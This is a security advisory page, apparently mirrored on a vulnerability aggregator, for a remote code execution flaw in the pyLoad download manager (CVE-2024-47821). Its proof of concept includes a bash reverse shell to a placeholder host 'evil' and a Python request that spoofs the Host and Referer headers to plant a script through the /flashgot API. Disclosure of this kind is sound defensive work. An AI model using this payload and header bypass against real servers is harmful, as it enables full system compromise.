Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-w7hq-f2pj-c53g

Опубликовано: 28 окт. 2024
Источник: github
Github: Прошло ревью
CVSS4: 8.5
CVSS3: 9.1

Описание

pyLoad vulnerable to remote code execution by download to /.pyload/scripts using /flashgot API

Summary

The folder /.pyload/scripts has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved. A file can be downloaded to such a folder by changing the download folder to a folder in /scripts path and using the /flashgot API to download the file.

Details

Configuration changes

  1. Change the download folder to /home/<user>/.pyload/scripts
  2. Change permissions for downloaded files:
    1. Change permissions of downloads: on
    2. Permission mode for downloaded files: 0744

Making the request to download files

The flashgot API provides functionality to download files from a provided URL. Although pyload tries to prevent non-local requests from being able to reach this API, it relies on checking the Host header and the Referer header of the incoming request. Both of these can be set by an attacker to arbitrary values, thereby bypassing these checks.

Referer header check

def flashgot(): if flask.request.referrer not in ( "http://localhost:9666/flashgot", "http://127.0.0.1:9666/flashgot", ): flask.abort(500) ...

Host header check for local check

def local_check(func): @wraps(func) def wrapper(*args, **kwargs): remote_addr = flask.request.environ.get("REMOTE_ADDR", "0") http_host = flask.request.environ.get("HTTP_HOST", "0") if remote_addr in ("127.0.0.1", "::ffff:127.0.0.1", "::1", "localhost") or http_host in ( "127.0.0.1:9666", "[::1]:9666", ): return func(*args, **kwargs) else: return "Forbidden", 403 return wrapper

Once the file is downloaded to a folder in the scripts folder, the attacker can perform the respective action, and the script will be executed

PoC

Create a malicious file. I have created a reverse shell

#!/bin/bash bash -i >& /dev/tcp/evil/9002 0>&1

Host this file at some URL, for eg: http://evil

Create a request like this for the flashgot API. I am using download_finished folder as the destination folder. Scripts in this folder are run when a download is completed.

import requests url = "http://pyload/flashgot" headers = {"host": "127.0.0.1:9666", "Referer": "http://127.0.0.1:9666/flashgot"} data = { "package": "download_finished", "passwords": "optional_password", "urls": "http://evil/exp.sh", "autostart": 1, } response = requests.post(url, data=data, headers=headers)

When the above request is made, exp.sh will be downloaded to /scripts/download_finished folder. For all subsequent downloads, this script will be run. Sending the request again causes a download of the file again, and when the download is complete, the script is run.

I also have a listener on my machine which receives the request from the pyload server. When the script executes, I get a connection back to my machine

Screenshots

Download folder

1

exp.sh is downloaded

2

Script is run

3

Reverse shell connection is received

4

Impact

This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system

Ссылки

Пакеты

Наименование

pyload-ng

pip
Затронутые версииВерсия исправления

< 0.5.0b3.dev87

0.5.0b3.dev87

EPSS

Процентиль: 85%
0.02574
Низкий

8.5 High

CVSS4

9.1 Critical

CVSS3

CVE ID

CVE-2024-47821

Дефекты

CWE-78

Связанные уязвимости

nvd логотип

CVE-2024-47821

CVSS3: 9.1
nvd
больше 1 года назад

pyLoad is a free and open-source Download Manager. The folder `/.pyload/scripts` has scripts which are run when certain actions are completed, for e.g. a download is finished. By downloading a executable file to a folder in /scripts and performing the respective action, remote code execution can be achieved in versions prior to 0.5.0b3.dev87. A file can be downloaded to such a folder by changing the download folder to a folder in `/scripts` path and using the `/flashgot` API to download the file. This vulnerability allows an attacker with access to change the settings on a pyload server to execute arbitrary code and completely compromise the system. Version 0.5.0b3.dev87 fixes this issue.

debian логотип

CVE-2024-47821

CVSS3: 9.1
debian
больше 1 года назад

pyLoad is a free and open-source Download Manager. The folder `/.pyloa ...

EPSS

Процентиль: 85%
0.02574
Низкий

8.5 High

CVSS4

9.1 Critical

CVSS3

CVE ID

CVE-2024-47821

Дефекты

CWE-78